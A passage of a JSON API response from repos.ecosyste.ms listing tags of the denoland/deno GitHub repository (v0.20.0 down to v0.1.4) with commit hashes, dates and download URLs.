https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha"